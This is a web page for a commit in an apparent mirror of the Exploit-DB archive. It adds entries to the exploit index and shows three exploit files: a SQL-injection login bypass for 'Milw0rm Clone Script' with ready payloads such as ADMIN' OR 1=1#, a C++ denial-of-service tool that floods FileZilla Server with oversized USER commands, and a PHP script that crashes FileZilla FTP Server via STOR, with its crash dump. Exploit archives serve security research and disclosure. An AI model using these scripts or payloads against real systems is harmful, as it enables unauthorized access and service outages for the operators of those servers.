bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-16

Browse source 
3 new exploits
This commit is contained in:
Offensive Security 2015-06-16 05:02:49 +00:00
parent 52c2474004
commit 961bfe01be
7 changed files with 478 additions and 288 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -1110,7 +1110,7 @@ id,file,description,date,author,platform,type,port
1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit",2005-11-18,BassReFLeX,multiple,dos,0
1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143 1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit",2005-11-20,y0,windows,remote,143
1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance proxystylesheet XSLT Java Code Execution",2005-11-20,"H D Moore",hardware,remote,80
1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow PoC",2005-11-21,"Inge Henriksen",windows,dos,0
1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0 1337,platforms/php/webapps/1337.php,"Mambo <= 4.5.2 Globals Overwrite / Remote Command Exection Exploit",2005-11-22,rgod,php,webapps,0
1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX Spoofed TCP SYN Packets Remote Denial of Service Exploit",2005-11-23,"Janis Vizulis",hardware,dos,0
1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0 1339,platforms/windows/dos/1339.c,"FreeFTPD <= 1.0.10 (PORT Command) Denial of Service Exploit",2005-11-24,"Stefan Lochbihler",windows,dos,0
@ -2575,7 +2575,7 @@ id,file,description,date,author,platform,type,port
2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0 2900,platforms/windows/dos/2900.py,"Microsoft Windows - DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0 2904,platforms/php/webapps/2904.txt,"mxBB Module Profile CP 0.91c Remote File Include Vulnerability",2006-12-09,bd0rk,php,webapps,0
@ -2588,7 +2588,7 @@ id,file,description,date,author,platform,type,port
2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0 2911,platforms/multiple/dos/2911.txt,"Sophos Antivirus - .CHM Chunk Name Length Memory Corruption PoC",2006-12-10,"Damian Put",multiple,dos,0
2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0 2912,platforms/multiple/dos/2912.txt,"Sophos / Trend Micro Antivirus - .RAR File Denial of Service PoC",2006-12-10,"Damian Put",multiple,dos,0
2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0
2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 - (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0
2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0
2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0
2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0
@ -23371,7 +23371,7 @@ id,file,description,date,author,platform,type,port
26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0 26217,platforms/php/webapps/26217.html,"CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability",2005-08-31,groszynskif,php,webapps,0
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access Vulnerability",2005-09-01,rotor,linux,local,0
26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service Vulnerability",2005-09-02,"Critical Security",windows,dos,0
26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0 26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key Vulnerability",2005-09-02,m123303@richmond.ac.uk,windows,dos,0
26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure Vulnerability",2005-09-05,"Gregory R. Panakkal",windows,remote,0
26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0
26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.PHP HTML Injection Vulnerability",2005-09-06,conor.e.buckley,php,webapps,0
@ -33455,7 +33455,7 @@ id,file,description,date,author,platform,type,port
37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC Remote Control Script",2015-05-20,Photubias,hardware,remote,0
37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80 37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0 37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve _/bin/sh_ - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0 37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 - execve _/bin/sh_ - shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
@ -33629,7 +33629,7 @@ id,file,description,date,author,platform,type,port
37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,80 37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,8080
37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80 37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
@ -33639,7 +33639,7 @@ id,file,description,date,author,platform,type,port
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80 37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0 37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@ -33649,3 +33649,6 @@ id,file,description,date,author,platform,type,port
37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0 37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0

Can't render this file because it is too large.

46
platforms/php/webapps/37290.txt Executable file
View file

@ -0,0 +1,46 @@
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
| Exploit Title: Milw0rm Clone Script v1.0 (Auth Bypass) SQL Injection Vulnerability |
| Date: 06.13.2015 |
| Exploit Daddy: Walid Naceri |
| Vendor Homepage: http://milw0rm.sourceforge.net/ |
| Software Link: http://sourceforge.net/projects/milw0rm/files/milw0rm.rar/download |
| Version: v1.0 |
| Tested On: Kali Linux, Mac, Windows |
|><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><|
| Website exploiter: WwW.security-Dz.Com |
| CALLINGout: 1337day/inj3ct0r Please admit that they got your server haha CIA |
| Sorry: Sorry pancaker, you missed that one :( |
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
### vuln codez admin/login.php ###
<?
$usr = htmlspecialchars(trim($_POST['usr'])); ---- what are you doing?
$pwd = htmlspecialchars(trim($_POST['pwd'])); ---- are you sure that you are a programmer?
if($usr && $pwd){
$login = mysql_query("SELECT * FROM `site_info` WHERE `adm_usr`='".$usr."' AND `adm_pwd`='".md5($pwd)."';");
$row = mysql_num_rows($login);
----Bla Bla Bla--------
### manual ###
Go to the login admin panel :)
Exploit 1:
USER: ADMIN' OR ''='
PASS: ADMIN' OR ''='
Exploit 2:
USER: ADMIN' OR 1=1#
PASS: Anything Bro :)
### How to fix, learn bro some php again :) ###
$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['usr'])));
$usr = htmlspecialchars(trim(mysql_real_escape_string($_POST['pwd'])));

220
platforms/windows/dos/1336.cpp
View file

@ -1,110 +1,110 @@
/* /*
FileZillaDoS.cpp FileZillaDoS.cpp
FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen. FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen.
Read the disclaimer at http://ingehenriksen.blogspot.com before using. Read the disclaimer at http://ingehenriksen.blogspot.com before using.
Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib". Made to work with Microsoft(R) Visual C++(R), to use link "WS2_32.lib".
*/ */
#include "stdafx.h" #include "stdafx.h"
#include <iostream> #include <iostream>
#include "Winsock2.h" #include "Winsock2.h"
#define BUFFSIZE 10000 #define BUFFSIZE 10000
#define ATTACK_BUFFSIZE 5000 #define ATTACK_BUFFSIZE 5000
using namespace std; using namespace std;
int _tmain(int argc, _TCHAR* argv[]) int _tmain(int argc, _TCHAR* argv[])
{ {
cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl; cout << "FileZilla Server Terminal 0.9.4d DoS PoC by Inge Henriksen." << endl;
cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." << endl; cout << "Read the disclaimer at http://ingehenriksen.blogspot.com before using." << endl;
if (argc!=3) // Exit if wrong number of arguments if (argc!=3) // Exit if wrong number of arguments
{ {
cerr << "Error: Wrong number of arguments" << endl; cerr << "Error: Wrong number of arguments" << endl;
cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl; cout << "Usage: " << argv[0] << " <Target IP> <Target Port>" << endl;
cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl; cout << "Example: " << argv[0] << " 192.168.2.100 21" << endl;
return (-1); return (-1);
} }
in_addr IPAddressData; in_addr IPAddressData;
__int64 counterVal; __int64 counterVal;
char* bufferData; char* bufferData;
char* attackStringData; char* attackStringData;
SOCKET sock; SOCKET sock;
sockaddr_in sinInterface; sockaddr_in sinInterface;
WSADATA wsaData; WSADATA wsaData;
int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2 int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); // Use Winsock version 2.2
if (iResult != NO_ERROR) if (iResult != NO_ERROR)
{ {
cerr << "Error: WSAStartup() failed" << endl; cerr << "Error: WSAStartup() failed" << endl;
return(-1); return(-1);
} }
int recvRet; int recvRet;
char tmpBuffer[BUFFSIZE]; char tmpBuffer[BUFFSIZE];
char tmpAttackBuffer[ATTACK_BUFFSIZE]; char tmpAttackBuffer[ATTACK_BUFFSIZE];
tmpAttackBuffer[0] = 'U'; tmpAttackBuffer[0] = 'U';
tmpAttackBuffer[1] = 'S'; tmpAttackBuffer[1] = 'S';
tmpAttackBuffer[2] = 'E'; tmpAttackBuffer[2] = 'E';
tmpAttackBuffer[3] = 'R'; tmpAttackBuffer[3] = 'R';
tmpAttackBuffer[4] = ' '; tmpAttackBuffer[4] = ' ';
int i; int i;
int j=5; int j=5;
for (i=j;i<ATTACK_BUFFSIZE-6;i++) for (i=j;i<ATTACK_BUFFSIZE-6;i++)
{ {
int k; int k;
for(k=j;k<=i;k++) for(k=j;k<=i;k++)
{ {
tmpAttackBuffer[k] = 'A'; tmpAttackBuffer[k] = 'A';
} }
tmpAttackBuffer[k] = '\n'; tmpAttackBuffer[k] = '\n';
tmpAttackBuffer[k+1] = '\0'; tmpAttackBuffer[k+1] = '\0';
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP ); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ((int)(sock)==-1) if ((int)(sock)==-1)
{ {
cerr << "Error: Could not create socket" << endl; cerr << "Error: Could not create socket" << endl;
return(-1); return(-1);
} }
sinInterface.sin_family = AF_INET; sinInterface.sin_family = AF_INET;
sinInterface.sin_addr.s_addr = inet_addr(argv[1]); sinInterface.sin_addr.s_addr = inet_addr(argv[1]);
sinInterface.sin_port = htons(atoi(argv[2])); sinInterface.sin_port = htons(atoi(argv[2]));
if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR)) if ((connect(sock,(sockaddr*)&sinInterface ,sizeof(sockaddr_in))!=SOCKET_ERROR))
{ {
int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0); int sendResult = send( sock, tmpAttackBuffer , (int)strlen(tmpAttackBuffer), 0);
cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl; cout << "Sent " << strlen(tmpAttackBuffer) << " characters" << endl;
if ( sendResult != SOCKET_ERROR ) if ( sendResult != SOCKET_ERROR )
{ {
recvRet = SOCKET_ERROR; recvRet = SOCKET_ERROR;
for (int i=0;i<BUFFSIZE;i++) for (int i=0;i<BUFFSIZE;i++)
tmpBuffer[i]=(char)0; tmpBuffer[i]=(char)0;
recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 ); recvRet = recv( sock, tmpBuffer , BUFFSIZE-1, 0 );
if ( recvRet == SOCKET_ERROR ) if ( recvRet == SOCKET_ERROR )
cerr << "Error: recv() failed" << endl; cerr << "Error: recv() failed" << endl;
else else
cout << "Response is: " << endl << tmpBuffer << endl;; cout << "Response is: " << endl << tmpBuffer << endl;;
} }
else else
cerr << "Error: send() failed" << endl; cerr << "Error: send() failed" << endl;
if (shutdown(sock,0)==SOCKET_ERROR) if (shutdown(sock,0)==SOCKET_ERROR)
cerr << "Error: shutdown() failed" << endl; cerr << "Error: shutdown() failed" << endl;
} }
else else
cerr << "Error: connect() failed" << endl; cerr << "Error: connect() failed" << endl;
if (closesocket(sock)==SOCKET_ERROR) if (closesocket(sock)==SOCKET_ERROR)
cerr << "Error: closesocket() failed" << endl; cerr << "Error: closesocket() failed" << endl;
} // End for loop } // End for loop
return 0; return 0;
} }
// milw0rm.com [2005-11-21] // milw0rm.com [2005-11-21]

208
platforms/windows/dos/2901.php
View file

@ -1,104 +1,104 @@
<?php <?php
# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service # Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
# by rgod # by rgod
# mail: retrog at alice dot it # mail: retrog at alice dot it
# site: http://retrogod.altervista.org # site: http://retrogod.altervista.org
# tested on WinXP sp2 # tested on WinXP sp2
error_reporting(E_ALL); error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp'); $service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3'); $address = gethostbyname('192.168.1.3');
$user="test"; $user="test";
$pass="test"; $pass="test";
$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu"; $junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) { if ($socket < 0) {
echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n"; echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$result = socket_connect($socket, $address, $service_port); $result = socket_connect($socket, $address, $service_port);
if ($result < 0) { if ($result < 0) {
echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n"; echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else { } else {
echo "OK.\n"; echo "OK.\n";
} }
$out=socket_read($socket, 240); $out=socket_read($socket, 240);
echo $out; echo $out;
$in = "USER ".$user."\r\n"; $in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASS ".$pass."\r\n"; $in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80); $out=socket_read($socket, 80);
echo $out; echo $out;
$in = "PASV ".$junk."\r\n"; $in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "PORT ".$junk."\r\n"; $in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
$in = "STOR ".$junk."\r\n"; $in = "STOR ".$junk."\r\n";
socket_write($socket, $in, strlen ($in)); socket_write($socket, $in, strlen ($in));
socket_close($socket); socket_close($socket);
/* /*
07:04:28.270 pid=0F84 tid=03A0 EXCEPTION (first-chance) 07:04:28.270 pid=0F84 tid=03A0 EXCEPTION (first-chance)
---------------------------------------------------------------- ----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [0000007C]) Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
---------------------------------------------------------------- ----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00 EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00 EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00 ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05 EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01 --> MOV BYTE PTR [ESI+7C],01
---------------------------------------------------------------- ----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled) 07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled)
---------------------------------------------------------------- ----------------------------------------------------------------
